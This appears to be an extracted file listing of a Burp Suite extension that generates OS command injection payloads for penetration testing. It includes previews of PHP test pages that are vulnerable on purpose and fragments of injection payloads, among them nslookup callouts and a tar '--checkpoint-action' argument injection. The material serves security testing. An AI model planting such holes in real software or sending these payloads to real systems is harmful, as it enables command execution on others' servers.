FILE: test_cases/arginj_wget_doublequote.php
function cmd_exec (line 7) | function cmd_exec($cmd, &$stdout, &$stderr)
FILE: test_cases/arginj_wget_noquotes.php
function cmd_exec (line 7) | function cmd_exec($cmd, &$stdout, &$stderr)
FILE: test_cases/arginj_wget_singlequote.php
function cmd_exec (line 7) | function cmd_exec($cmd, &$stdout, &$stderr)
FILE: test_cases/tar.php
function cmd_exec (line 8) | function cmd_exec($cmd, &$stdout, &$stderr)
Condensed preview — 51 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (431K chars).
[
{
"path": "BappDescription.html",
"chars": 843,
"preview": "<p>This extension is a customizable payload generator, suitable for detecting OS command injection flaws during dynamic "
},
{
"path": "BappManifest.bmf",
"chars": 422,
"preview": "Uuid: 33e4402eee514724b768c0342abadb8a\nExtensionType: 1\nName: Command Injection Attacker\nRepoName: command-injection-att"
},
{
"path": "DETECTING_ARGUMENT_INJECTION.md",
"chars": 2590,
"preview": "# Detecting argument injection\nApart from differences in application's response, we might dalso detect argument injectio"
},
{
"path": "Java/src/burp/BinaryPayloadIssue.java",
"chars": 710,
"preview": "\n\npackage burp;\n\n\npublic class BinaryPayloadIssue extends ShellingScannerIssue {\n\tprivate String issueDetail;\n\t\n\tprivate"
},
{
"path": "Java/src/burp/BuildUnencodedRequest.java",
"chars": 1613,
"preview": "package burp;\n\nimport java.util.Random;\n\npublic class BuildUnencodedRequest\n{\n private Random random = new Random();\n"
},
{
"path": "Java/src/burp/BurpExtender.java",
"chars": 1266,
"preview": "package burp;\r\n\r\n\r\nimport uk.co.pentest.SHELLING.SHELLING;\r\nimport uk.co.pentest.SHELLING.ShellingTab;\r\nimport uk.co.pen"
},
{
"path": "Java/src/burp/DirectScannerCheck.java",
"chars": 14547,
"preview": "/*\n \n The simple scanner check class for SHELLING.\n Sends all the payloads one after another, supports DNS (network) and"
},
{
"path": "Java/src/burp/ShellingScannerCheck.java",
"chars": 2234,
"preview": "/*\n\tParent abstract class for Active Scan checks to detect Command Injection with Burp Collaborator. \n Initialize"
},
{
"path": "Java/src/burp/ShellingScannerIssue.java",
"chars": 2445,
"preview": "\npackage burp;\n\nimport java.net.URL;\n\n\nabstract public class ShellingScannerIssue implements IScanIssue {\n\t//IScanIssue "
},
{
"path": "Java/src/uk/co/pentest/SHELLING/IntruderPayloadGenerator.java",
"chars": 53617,
"preview": "package uk.co.pentest.SHELLING;\n\nimport burp.BurpExtender;\nimport burp.IBurpExtenderCallbacks;\nimport burp.IHttpRequestR"
},
{
"path": "Java/src/uk/co/pentest/SHELLING/IntruderPayloadGeneratorByte.java",
"chars": 8176,
"preview": "package uk.co.pentest.SHELLING;\n\nimport burp.BurpExtender;\nimport burp.IBurpExtenderCallbacks;\nimport burp.IIntruderPayl"
},
{
"path": "Java/src/uk/co/pentest/SHELLING/PayloadFactory.java",
"chars": 2024,
"preview": "/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choo"
},
{
"path": "Java/src/uk/co/pentest/SHELLING/SHELLING.java",
"chars": 245,
"preview": "package uk.co.pentest.SHELLING;\r\n\r\nimport burp.IBurpExtenderCallbacks;\r\n\r\n/**\r\n * Used to store global variables.\r\n */\r\n"
},
{
"path": "Java/src/uk/co/pentest/SHELLING/ShellingPanel2.form",
"chars": 75801,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\n\n<Form version=\"1.8\" maxVersion=\"1.9\" type=\"org.netbeans.modules.form.forminfo.J"
},
{
"path": "Java/src/uk/co/pentest/SHELLING/ShellingPanel2.java",
"chars": 107175,
"preview": "/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choo"
},
{
"path": "Java/src/uk/co/pentest/SHELLING/ShellingTab.java",
"chars": 1231,
"preview": "package uk.co.pentest.SHELLING;\r\n\r\nimport burp.ITab;\r\nimport java.awt.Color;\r\nimport java.util.Objects;\r\nimport javax.sw"
},
{
"path": "Java/src/uk/co/pentest/SHELLING/SimpleDocumentListener.java",
"chars": 511,
"preview": "package uk.co.pentest.SHELLING;\r\n\r\nimport javax.swing.event.DocumentEvent;\r\nimport javax.swing.event.DocumentListener;\r\n"
},
{
"path": "Java/src/uk/co/pentest/SHELLING/collabSession.java",
"chars": 2150,
"preview": "/*\n * To change this license header, choose License Headers in Project Properties.\n * To change this template file, choo"
},
{
"path": "README.md",
"chars": 38793,
"preview": "Original work by: Julian H. https://github.com/ewilded/shelling\n\n# SHELLING - a comprehensive OS command injection paylo"
},
{
"path": "TODO.txt",
"chars": 3244,
"preview": "SHELLING TODO\n--------------------------------\n\nTODO for the next release:\n- consider/test the double-separator idea (at"
},
{
"path": "VERY_DEPRECATED_AND_NO_LONGER_MAINTAINED_shelling.pl",
"chars": 12298,
"preview": "#!/usr/bin/perl\n\n## SHELLING - payload generator by ewilded, tuned for OS command injection\n\nuse strict;\nno strict 'refs"
},
{
"path": "build.gradle",
"chars": 459,
"preview": "apply plugin: 'java'\n\ntasks.withType(JavaCompile) {\n options.encoding = 'UTF-8'\n}\n\nrepositories {\n mavenCentral()\n"
},
{
"path": "settings.gradle",
"chars": 30,
"preview": "rootProject.name = 'shelling'\n"
},
{
"path": "test_cases/arginj1.php",
"chars": 1617,
"preview": "<?php\n# filename: arginj1.php\n# vulnerable to argument injection\n#\n\nfunction cmd_exec($cmd, &$stdout, &$stderr)\n{\n $o"
},
{
"path": "test_cases/arginj_escape_shell_cmd.php",
"chars": 632,
"preview": "<?php\n# filename: arg_escape_shell_cmd.php\n# should be vulnerable to argument injection\n# although it is not possible to"
},
{
"path": "test_cases/arginj_wget_doublequote.php",
"chars": 1690,
"preview": "<?php\n# filename: arginj_wget_doublequote.php\n# vulnerable to argument injection\n#\nerror_reporting(E_ALL);\n//ini_set('di"
},
{
"path": "test_cases/arginj_wget_noquotes.php",
"chars": 1697,
"preview": "<?php\n# filename: arginj_wget_noquotes.php\n# apparently NOT vulnerable to argument injection\n#\nerror_reporting(E_ALL);\n/"
},
{
"path": "test_cases/arginj_wget_singlequote.php",
"chars": 1690,
"preview": "<?php\n# filename: arginj_wget_singlequote.php\n# vulnerable to argument injection\n#\nerror_reporting(E_ALL);\n//ini_set('di"
},
{
"path": "test_cases/escape_cmd_shell_direct.php",
"chars": 242,
"preview": "<?php\n# filename: escape_cmd_shell_direct.php\n# does not look vulnerable, but we need to make sure :D\n\t$command = 'dir '"
},
{
"path": "test_cases/escape_shell_cmd.php",
"chars": 436,
"preview": "<?php\n# filename: escape_shell_cmd.php\n# vulnerable to the additional alternative command separator 0x1A only working af"
},
{
"path": "test_cases/lax_domain_name.php",
"chars": 7122,
"preview": "<?php\n# filename: lax_domain_name.php\n# vulnerable as the regex is too lose\n# sample successful payloads:\n/*\na.a.com%7C%"
},
{
"path": "test_cases/no_colon_no_pipe_no_ampersand_no_dollar.php",
"chars": 4201,
"preview": "<?php\n# filename: no_colon_no_pipe_no_ampersand_no_dollar.php\n# vulnerable to newline and backtick injection\n# sample su"
},
{
"path": "test_cases/no_space.php",
"chars": 4389,
"preview": "<?php\n# filename: no_space.php\n# vulnerable (alternative argument separator needs to be applied as space is filtered)\n# "
},
{
"path": "test_cases/no_space_no_colon_no_pipe_no_ampersand.php",
"chars": 6334,
"preview": "<?php\n# filename: no_space_no_colon_no_pipe_no_ampersand.php\n# vulnerable\n# sample exploits:\n/*\n%0A%24%28nslookup%09422."
},
{
"path": "test_cases/no_white_chars.php",
"chars": 280,
"preview": "<?php\n# filename: no_white_chars.php \n# vulnerable, just use a creative non-white alternative argument separator\n# \n\nif("
},
{
"path": "test_cases/no_white_chars_no_colon_no_pipe_no_ampersand.php",
"chars": 1974,
"preview": "<?php\n# filename: no_white_chars_no_colon_no_pipe_no_ampersand.php\n# vulnerable with newline as command separator\n# samp"
},
{
"path": "test_cases/no_white_chars_no_colon_no_pipe_no_ampersand_and_quote.php",
"chars": 679,
"preview": "<?php\n# filename: no_white_chars_no_colon_no_pipe_no_ampersand_no_quote.php\n# vulnerable to command injection\n# sample e"
},
{
"path": "test_cases/no_white_chars_no_colon_no_pipe_no_ampersand_no_dollar.php",
"chars": 688,
"preview": "<?php\n# filename: no_white_chars_no_colon_no_pipe_no_ampersand_no_dollar.php\n# does not appear to be vulnerable to newli"
},
{
"path": "test_cases/no_white_chars_start_alphanum.php",
"chars": 179,
"preview": "<?php\nif(isset($_POST['dir'])&&!preg_match('/\\s+/',$_POST['dir'])&&preg_match('/^\\w+/',$_POST['dir']))\n{\n\t echo \"Dir con"
},
{
"path": "test_cases/no_white_chars_start_digit.php",
"chars": 295,
"preview": "<?php\n# filename: no_white_chars_start_digit.php\n# vulnerable to payloads starting with a digit\n\nif(isset($_GET['dir'])&"
},
{
"path": "test_cases/no_white_chars_stop_alnum.php",
"chars": 297,
"preview": "<?php\n# filename: no_white_chars_stop_digit.php\n# vulnerable, the payload has to end with a digit\n\nif(isset($_GET['dir']"
},
{
"path": "test_cases/no_white_chars_stop_alphanum.php",
"chars": 327,
"preview": "<?php\n# filename: no_white_chars_stop_alphanum.php\n# vulnerable, the payload needs to end with an alphanum character\n#\n\n"
},
{
"path": "test_cases/no_white_chars_windows_blind.php",
"chars": 324,
"preview": "<?php\n# filename: no_white_chars_windows_blind.php\n# vulnerable, no response directly shown\n# \n\nif(isset($_GET['dir'])&&"
},
{
"path": "test_cases/no_white_space_no_colon_no_pipe_no_ampersand_no_dollar.php",
"chars": 307,
"preview": "<?php\n# filename: no_white_spaces_no_colon_no_pipe_no_ampersand_no_dollar.php\n# vulnerable to newline\n# \nif(isset($_GET["
},
{
"path": "test_cases/simple.php",
"chars": 173,
"preview": "<?php\n# filename: simple.php\n# vulnerable, simply\n\nif(isset($_GET['dir'])) echo \"Dir contents are:\\n<br />\".shell_exec(\""
},
{
"path": "test_cases/simple_nested_quotes1.php",
"chars": 17528,
"preview": "<?php\n# filename: simple_nested_quotes1.php\n# vulnerable\n# sample payloads:\n/*\n%0A%24%28nslookup%09662.gyiinmbeglu6qgz1m"
},
{
"path": "test_cases/simple_no_spaces.php",
"chars": 328,
"preview": "<?php\n# filename: simple_no_space.php\n# vulnerable, an argument separator other than whitespace needs to be used (e.g. t"
},
{
"path": "test_cases/simple_start_alphanum.php",
"chars": 12831,
"preview": "<?php\n# filename: simple_start_alphanum.php\n# vulnerable, has to start with an alphanumeric character\n# sample payloads:"
},
{
"path": "test_cases/simple_stop_alphanum.php",
"chars": 12939,
"preview": "<?php\n# filename: simple_stop_alphanum.php\n# vulnerable, needs to end with an alphanumeric character\n# sample payloads:\n"
},
{
"path": "test_cases/tar.php",
"chars": 1585,
"preview": "<?php\n# tar argument injection via --checkpoint-action=ACTIOLqN\n# evil payload:\n# /test_cases/GET/tar.php?dir=/dev/null%"
}
]
// ... and 1 more files (download for full content)
About this extraction
This page contains the full source code of the PortSwigger/command-injection-attacker GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 51 files (403.5 KB), approximately 107.8k tokens, and a symbol index with 137 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.